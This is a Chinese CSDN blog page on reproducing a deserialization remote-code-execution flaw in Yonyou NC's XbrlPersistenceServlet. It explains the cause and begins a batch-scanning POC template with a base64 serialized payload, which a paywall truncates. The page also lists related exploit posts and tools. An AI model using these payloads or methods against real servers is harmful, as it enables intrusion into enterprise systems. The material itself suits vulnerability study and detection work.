用友NC_XbrlPersistenceServlet_RCE漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-17 16:12:32 修改

阅读量50

点赞数

分类专栏：漏洞复现文章标签： web安全

于 2024-04-17 16:11:36 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/137877381

版权

漏洞复现专栏收录该内容

361 篇文章 114 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

漏洞背景

2021年爆出用友NC XbrlPersistenceServlet 存在反序列化漏洞，漏洞原理相对简单。

漏洞复现

直接将request请求流反序列化输出一个HashMap，由于用友nc使用不安全的common-collections组件导致此反序列化点可以被利用实现代码执行。

使用yso生成序列化数据后构造数据包即可实现命令执行。

TscanPOC

params: []
name: YonYou_NCXbrlPersistenceServlet_RCE
set:
  poc: base64Decode(b'rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphd

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
用友NC_XbrlPersistenceServlet_RCE漏洞（含批量验证poc）

用友NC_XbrlPersistenceServlet_RCE漏洞（含批量验证poc）
复制链接

扫一扫

专栏目录

订阅专栏

用友NC Cloud FileParserServlet反序列化RCE漏洞复现

0xSec

12-05

1030

用友 NC Cloud FileParserServlet接口存在反序列化代码执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

用友OA检测工具-YongYouNcTool

siu~

08-23

512

用友NC系列漏洞检测利用工具，支持一键检测、命令执行回显、文件落地、一键打入内存马、文件读取等

参与评论您还未登录，请先登录后发表或查看评论

EtMi832#PeiQi-WIKI-POC#用友 NC XbrlPersistenceServlet反序列化2

07-25

用友 NC XbrlPersistenceServlet反序列化漏洞描述用友 NC XbrlPersistenceServlet反序列化漏洞漏洞影响用友NC漏洞

漏洞分析 | U8 Cloud ServiceDispatcher反序列化漏洞及补丁分析

m0_46699477的博客

11-04

1577

本文对 U8Cloud ServiceDispatcher 接口反序列化漏洞原理进行跟踪分析，讲述了该漏洞是如何被利用以及官方的修复方式。

2021HW | 04/11 第三天总结

hackzkaq的博客

04-12

1394

HW情报

用友NC FileUploadServlet 反序列化RCE漏洞复现

0xSec

12-04

1348

用友 NC nc.file.pub.imple.FileUploadServlet 反序列化漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

用友U8 Cloud 反序列化RCE漏洞复现

0xSec

11-08

3872

用友U8Cloud存在多处（FileManageServlet和LoginVideoServlet）反序列化漏洞，系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作，结合系统本身存在的反序列化利用链，最终造成远程代码执行。

SMBGhost_RCE_PoC-master.zip

06-11

标题中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件，其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行（RCE）的概念验证（PoC）代码。这个漏洞被称为CVE-2020-0796，它是在服务器消息块版本3（SMBv3）...

RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络

09-23

在IT领域，特别是机器学习和神经网络模型设计中，“RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络”这个标题所涵盖的知识点非常丰富。首先，我们要了解RCE网络，全称为“衰减库仑势”（Radiation-charge exchange...

cve_2019_0708_bluekeep_rce:蓝皮漏洞利用

04-29

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...

SMBGhost_RCE_PoC

03-18

SMBGhost_RCE_PoC CVE-2020-0796“ SMBGhost”的RCE PoC 仅用于演示目的！仅将此用作参考。严重地。这尚未在我的实验室环境之外进行过测试。它写得很快，需要做一些工作才能更可靠。有时你会蓝屏。除了自我教育以外...

用友 NC mxservlet 反序列化漏洞

qq_39573664的博客

12-26

954

用友NC mxservlet处存在反序列化漏洞，攻击者通过漏洞可以获取网站权限，导致服务器失陷。

如何用IP地址申请SSL证书实现网络安全

2401_84891336的博客

07-10

404

申请IP地址SSL证书

网络安全防御【防火墙NAT智能选举综合实验】

miss_copper的博客

07-13

928

需要新创建一个源地址转池：这里我们将配置黑洞路由勾选(防止路由环路，还可以引入到OSPF等动态路由协议中发布出去)，允许端口地址转换取消勾选（因为我们这里是多对多的NAT，源NAT地址转换，如果勾选了端口地址转换，就成了端口映射，成了目标NAT）这种方式可以提高安全性，因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5，和分公司server5和client6的域名服务器地址，并且公网中的server4（NDS服务器）开启DNS服务，和分公司的server5开启http服务器。

网络安全防御【防火墙安全策略用户认证综合实验】

miss_copper的博客

07-10

1236

先新建一个管理员角色（网络安全管理员）：再新建一个管理员（用户名密码自拟）：至此本实验全部结束！！！

7.13实训日志

最新发布

Kidding_Ma的博客

07-13

160

作为一名大学生，我深感有责任在今后的学习和职业生涯中，为推动网络安全技术的发展和应用做出贡献，保障数字化社会的安全和稳定发展。在技术方面，我们学习了多种编程语言和工具的应用，如Python用于爬虫和脚本、Java用于代码审计和漏洞挖掘、C语言用于二进制漏洞挖掘等。会上，专家学者们分享了关于网络安全最新的研究成果和技术应用，以及面临的挑战和未来的发展方向，给我留下了深刻的印象和启发。学习网络安全的过程中，我们深入了解了网络的不同层面和技术，从表层网络到深网再到暗网，以及涉及的产业分类和技术工具。

网络安全法视角下的等保测评法律责任与风险控制

ddcajdkdl的博客

07-11

418

直接责任人员处罚：对于违反网络安全法规定，导致严重后果的，不仅单位要承担责任，直接负责的主管人员和其他直接责任人员也可能被处以罚款，甚至追究刑事责任。该法于2017年6月1日正式实施，其中对网络安全等级保护制度（简称“等保”）做出了明确规定，要求网络运营者根据其网络的重要程度及潜在影响，实施相应级别的安全保护措施。综上所述，从《网络安全法》的角度出发，等保测评不仅是法律规定的强制性要求，也是企业自我保护、规避法律风险、维护信誉和业务连续性的关键措施。

网络安全——防御实验

Nirvana92的博客

07-09

1084

# 防御实验一 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/63794e616c244387a03fae34450d6f00.png) #### 拓扑结构展示： ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/eb297641443c4f78b6c93c432e2b5286.png) ## 一、 ### 根据题目，先为办公区做**安全策略**主要策略有以下几点： 1、书写名称和描述，名称和描述要**明确**，让除本人

74CMS_v5.0.1后台RCE分析1

08-03

74CMS_v5.0.1后台RCE漏洞分析在本次漏洞分析中，我们将对74CMS_v5.0.1后台RCE漏洞进行深入分析。该漏洞主要存在于后台管理账户中，需要登录后台管理账户才能够实现RCE。但是在漏洞的挖掘思路以及利用过程中，我们...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交